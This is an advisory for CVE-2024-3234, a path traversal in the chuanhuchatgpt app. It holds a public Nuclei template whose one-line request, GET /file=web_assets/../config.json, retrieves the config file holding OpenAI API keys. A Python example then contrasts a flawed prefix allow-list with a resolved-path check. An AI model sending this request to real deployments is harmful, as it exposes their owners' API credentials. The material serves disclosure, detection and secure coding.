The gaizhenbiao/chuanhuchatgpt application is vulnerable to path traversal because it bundles an outdated gradio component. The application intends to restrict file access to resources under its `web_assets` folder, but the gradio version it ships is affected by CVE-2023-51449, a path traversal in gradio's `/file=` route (fixed in gradio 4.11.0). An unauthenticated attacker can therefore step out of `web_assets` with `..` segments and read sensitive files such as `config.json`, which holds the deployment's API keys. All versions of chuanhuchatgpt prior to the fixed version released on 20240305 are affected.
PoC code [public]
id: CVE-2024-3234

info:
  name: Chuanhu Chat - Directory Traversal
  author: DhiyaneshDk
  severity: critical
  description: |
    The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the `web_assets` folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as `config.json`, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3234
    cwe-id: CWE-22
    epss-score: 0.65655
    epss-percentile: 0.98451
    cpe: cpe:2.3:a:gaizhenbiao:chuanhuchatgpt:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gaizhenbiao
    product: chuanhuchatgpt
  tags: cve,cve2024,chuanhuchatgpt,lfi

http:
  - raw:
      - |
        GET /file=web_assets/../config.json HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"openai_api_key":'
          - '"openai_api_type":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220278e43665ca305d5e423b939d334304c573c85140c0c9e2e532b41f79fdee64302206d218c41721023dcfc90c2ca127cbe0fe9abcb8f9e81a3a1fc3e61f992dece35:922c64590222798bb761d5b6d8e72950
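The description above says the application meant to confine `/file=` requests to `web_assets`, yet the PoC path `web_assets/../config.json` gets through. The following is an added illustration of that root cause (CWE-22), written for this page; it is not code from chuanhuchatgpt or gradio, and the function names, the `web_assets` prefix rule and the temporary directory layout are constructed here. It contrasts a string-prefix allow-list, which accepts the PoC path because the string literally begins with `web_assets/`, with a check that resolves the path on the real filesystem before deciding; the resolved check also handles percent-encoded dots and absolute paths.

```python
"""Added example (not project code): why a prefix allow-list fails for
`web_assets/../config.json` and how a resolved-path check stops it."""
import os
import shutil
import tempfile
from urllib.parse import unquote

ALLOWED_DIR = "web_assets"            # directory the app intends to expose
PROBE = "web_assets/../config.json"   # path used in the PoC request above


def naive_is_allowed(requested: str, allowed_dir: str = ALLOWED_DIR) -> bool:
    """Flawed pattern: a prefix test on the raw request string.
    'web_assets/../config.json'.startswith('web_assets/') is True, so the
    traversal passes even though it leaves the allowed directory."""
    return requested.startswith(allowed_dir.rstrip("/") + "/")


def resolved_is_allowed(app_root: str, requested: str,
                        allowed_dir: str = ALLOWED_DIR) -> bool:
    """Hardened pattern: percent-decode, resolve '..' and symlinks against the
    real filesystem, then require the result to sit under the allowed dir."""
    allowed_real = os.path.realpath(os.path.join(app_root, allowed_dir))
    # Decode first so 'web_assets/%2e%2e/config.json' is judged as '..'.
    candidate = unquote(requested)
    # An absolute path here (e.g. '/etc/passwd') discards app_root in join,
    # which is fine: realpath + commonpath still rejects it below.
    target_real = os.path.realpath(os.path.join(app_root, candidate))
    try:
        return os.path.commonpath([allowed_real, target_real]) == allowed_real
    except ValueError:
        return False  # no common prefix at all (e.g. different Windows drives)


def build_demo_root() -> str:
    """Constructed layout mirroring the advisory: an app root holding
    web_assets/ and a config.json with (fake) API credentials."""
    root = tempfile.mkdtemp(prefix="chuanhu_demo_")
    os.makedirs(os.path.join(root, "web_assets"))
    with open(os.path.join(root, "web_assets", "style.css"), "w") as fh:
        fh.write("body {}")
    with open(os.path.join(root, "config.json"), "w") as fh:
        fh.write('{"openai_api_key": "sk-EXAMPLE-NOT-REAL", '
                 '"openai_api_type": "openai"}')
    return root


def evaluate(requested: str) -> dict:
    """Run both checks against the constructed app root and report verdicts."""
    root = build_demo_root()
    try:
        return {
            "naive": naive_is_allowed(requested),
            "resolved": resolved_is_allowed(root, requested),
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path in ("web_assets/style.css", PROBE,
                 "web_assets/%2e%2e/config.json", "/etc/passwd"):
        print(f"{path!r:40} -> {evaluate(path)}")
```

The check that matters is the one performed after resolution: `os.path.realpath` collapses `..` and follows symlinks, and `os.path.commonpath` then tells you whether the final location is still inside the allowed directory. Comparing the raw request string, or normalising it without touching the filesystem, leaves symlinked files inside `web_assets` and encoded traversal sequences as open questions.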